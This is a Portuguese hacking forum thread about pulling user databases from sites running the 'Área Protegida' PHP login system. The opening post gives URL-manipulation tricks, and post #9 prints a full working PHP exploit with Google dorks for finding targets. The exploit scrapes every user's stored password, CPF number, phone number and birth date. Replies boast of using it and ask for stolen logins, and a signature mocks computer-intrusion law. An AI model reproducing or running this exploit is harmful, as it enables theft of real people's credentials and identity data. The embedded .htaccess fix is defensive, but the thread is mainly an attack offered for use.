Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Formulários para pegar o BD em 30 segundos

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Formulários para pegar o BD em 30 segundos

    1. Trocar entrar.php?url=(...) por usuarios/ para acessar o BD.
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    2. Trocar (...).htm(...) por (...).apw
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Para saber como eu encontrei pesquisem em meus posts algo sobre a importância do footprinting, porque isto é só uma amostra. Há muito mais!
    Este material pode ser compartilhado, desde que os devidos créditos sejam dados.



    Notify-list · Twitter · Blog

    Nova lei: Invadir computadores protegidos é crime.
    Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)
    Similar Threads

  • Font Size
    #2
    Parabens começando a estudar pelo assunto imediatamente.


    Comment


    • Font Size
      #3
      esse Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... me rendeu uma bela visita a california aishaiohsasi
      "Você pode ter a fé que quiser em espíritos, em vida após a morte, no paraíso e no inferno, mas se tratando desse mundo, não seja idiota. Porque você pode me dizer que deposita sua fé em Deus para passar pelo dia, mas quando chega a hora de atravessar a rua, eu sei que você olha para os dois lados"

      Comment


      • Font Size
        #4
        ohh mano esse qual id e senha ? abraçç vlew

        Comment


        • Font Size
          #5
          poxa nao estou conseguindo ter acesso ao conteudo dos link....me ajudeeem !

          Comment


          • Font Size
            #6
            explica melhor? oO

            Comment


            • Font Size
              #7
              Uma explicação melhor seria útil

              Comment


              • Font Size
                #8
                Explicação melhor Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar....
                Este material pode ser compartilhado, desde que os devidos créditos sejam dados.



                Notify-list · Twitter · Blog

                Nova lei: Invadir computadores protegidos é crime.
                Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)

                Comment


                • Font Size
                  #9
                  Ou usando este exploit:
                  Código PHP:
                  <?php
                  # Exploit Title: Área Protegida
                  # Google Dork: inurl:"cadastro.php" intitle:VIAGIZ
                  # Date: 2012-03-27
                  # Author: WhiteCollarGroup
                  # Version: 1.0
                  /*
                  "Área Protegida"
                  desenvolvida por Viagiz.com

                  Exploit desenvolvido por WhiteCollarGroup
                  WCG147 | 0KaL | #M0rph | NB

                  Dorks:
                  inurl:entrar.php intitle:"Página protegida"
                  inurl:"cadastro.php" intitle:VIAGIZ
                  inurl:"entrar.php" intext:"Área protegida"

                  Sistema: Área Protegida
                  Desenvolvedor: Viagiz.com
                  Descrição: Sistema de gerenciamento de usuários desenvolvido em PHP que não requer SQL.

                  Falha: Acesso ao banco de dados
                  O sistema utiliza arquivos de texto para guardar seus dados, e não há proteção contra acesso nestes arquivos.
                  Versões atingidas: 1.0 (atual em 27/03/2012)

                  Reportagem: Não foi possível entrar em contato com os desenvolvedores.

                  Resolução:
                  Crie um arquivo de nome '.htaccess' no diretório "usuarios/" e coloque o seguinte conteúdo:
                  #begin
                  Order Allow,Deny
                  Deny from All
                  #end

                  */
                  set_time_limit(0);
                  function 
                  show($msg) {
                    echo 
                  $msg."\r\n";
                  }

                  show("\"Área Protegida\" (acesso ao banco de dados) Exploit\n
                  Coded by WhiteCollarGroup
                  WCG147 | 0KaL | #M0rph | NB
                  @WCollarGroup
                  whitecollar_group@hotmail.com"
                  );

                  if(
                  $argc!=2) {
                    
                  show("Uso: php $argv[0] [host+path]
                    Exemplo:
                    php 
                  $argv[0] http://www.site.com/paginaprotegida/entrar.php?url=/paginaprotegida/index.php");
                    exit;
                  }

                  $path $argv[1];
                  if(
                  substr($path, -11)=="/") {
                    
                  $path substr($path0, -1);
                  }

                  if(
                  strpos($path"?")) {
                    
                  $patharr explode("?"$path);
                    
                  $path $patharr[0];
                  }

                  $end end(explode("/"$path));
                  if(
                  preg_match("/^(.*)\.(.*)$/"$end)) {
                    
                  $path dirname($path)."/";
                  }

                  show("[*] Verificando vulnerabilidade...");
                  $payload = @file_get_contents($path."usuarios/");
                  if(!
                  $payload) {
                    
                  show("[!] Não foi possível ler o conteúdo do servidor.");
                    exit;
                  }

                  show("[*] Obtendo lista de usuários...");
                  preg_match_all("/\.txt\">(.*)\.txt<\/a>/"$payload$users);
                  //print_r($users);
                  show("[*] ".count($users[1])." usuários encontrados.");
                  show("[*] Obtendo dados dos usuários...");
                  foreach(
                  $users[1] as $u) {
                    
                  $dados = @file_get_contents($path."usuarios/".$u.".txt");
                    
                  $dados_r = array("<?php\n""$""=""\n?>""\n\n""<?php""senha""nome""cpf""data""fone""cad");
                    
                  $dados_t = array(nullnull": "null"\n"null"Senha""Nome""CPF""Nascimento""Telefone""Cadastro");
                    
                  $dados str_replace($dados_r$dados_t$dados);
                    
                  $dados str_replace("Senha:""Login: $u\nSenha:"$dados);
                    
                  show($dados);
                  }
                  show("\n[*] Exploit complete.\n");
                  Este material pode ser compartilhado, desde que os devidos créditos sejam dados.



                  Notify-list · Twitter · Blog

                  Nova lei: Invadir computadores protegidos é crime.
                  Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)

                  Comment

                  X
                  Working...
                  X